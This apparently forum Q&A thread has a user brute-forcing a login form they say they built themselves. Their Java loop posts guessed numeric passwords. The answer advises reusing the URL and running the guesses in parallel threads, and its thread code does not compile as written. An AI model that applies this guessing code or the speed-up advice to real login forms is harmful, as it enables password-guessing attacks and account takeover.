I'm trying to brute force a simple login form I myself created on my website. Initially I used WebScarab's fuzzer plugin, it's pretty fast. Then I want to customize more so I think I can get the brute force done with very simple coding. But to my surprise, my Java code runs so slow: about 2.5 request per second, which is much slower than the plugin of WebScarab... I feel I'm not doing the connection part right maybe.. Any help? Thanks!
public class HTTPURLConnection {
int guessPassword = 0;
public static void main(String[] args) throws Exception {
HTTPURLConnection http = new HTTPURLConnection();
System.out.println("Start!");
//I'm simply guessing password ranging from 0 to 200
for (int i =0; i<200; i++) {
if(http.sendPost())
break;
}
System.out.println("Done!");
}
private boolean sendPost() throws Exception {
String url = "http://mywebsite.com/myfile.php";
URL obj = new URL(url);
HttpURLConnection con = (HttpURLConnection) obj.openConnection();
//add request header
con.setRequestMethod("POST");
con.setRequestProperty("User-Agent", "Mozilla/5.0 etc.");
con.setRequestProperty("Accept-Language", "en-US,en;q=0.8");
con.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
con.setRequestProperty("Connection", "keep-alive");
con.setRequestProperty("Accept", "*/*");
con.setRequestProperty("Accept-Encoding", "gzip,deflate,sdch");
guessPassword ++;
String urlParameters = "name=userName&pwd="+guessPassword;
// Send post request
con.setDoOutput(true);
DataOutputStream wr = new DataOutputStream(con.getOutputStream());
wr.writeBytes(urlParameters);
wr.flush();
wr.close();
int responseCode = con.getResponseCode();
BufferedReader in = new BufferedReader(
new InputStreamReader(con.getInputStream()));
String inputLine;
StringBuffer response = new StringBuffer();
while ((inputLine = in.readLine()) != null) {
response.append(inputLine);
}
in.close();
//if password is not correct, my form should return false
if (response.toString().equals("false"))
return false;
else
return true;
}
}
You could change the input size of the BufferedReader to be bigger.... Try using the same url object instead of re-creating it each time....
Also, you can run this method multiple times at the same time as threads....
class HTTPThread extends Thread {
URL url;
boolean success = false;
String pass;
PrimeThread(Url url,String pass) {
this.url = url;
this.pass = pass;
}
public void run() {
HttpURLConnection con = (HttpURLConnection) url.openConnection();
//add request header
con.setRequestMethod("POST");
con.setRequestProperty("User-Agent", "Mozilla/5.0 etc.");
con.setRequestProperty("Accept-Language", "en-US,en;q=0.8");
con.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
con.setRequestProperty("Connection", "keep-alive");
con.setRequestProperty("Accept", "*/*");
con.setRequestProperty("Accept-Encoding", "gzip,deflate,sdch");
String urlParameters = "name=userName&pwd="+pass;
// Send post request
con.setDoOutput(true);
DataOutputStream wr = new DataOutputStream(con.getOutputStream());
wr.writeBytes(urlParameters);
wr.flush();
wr.close();
int responseCode = con.getResponseCode();
BufferedReader in = new BufferedReader(
new InputStreamReader(con.getInputStream()));
String inputLine;
StringBuffer response = new StringBuffer();
while ((inputLine = in.readLine()) != null) {
response.append(inputLine);
}
in.close();
//if password is not correct, my form should return false
if (response.toString().equals("false"))
success= false;
else
success= true;
}
}
public String getPassword(){return pass;}
public boolean isSuccess(){return success;}
}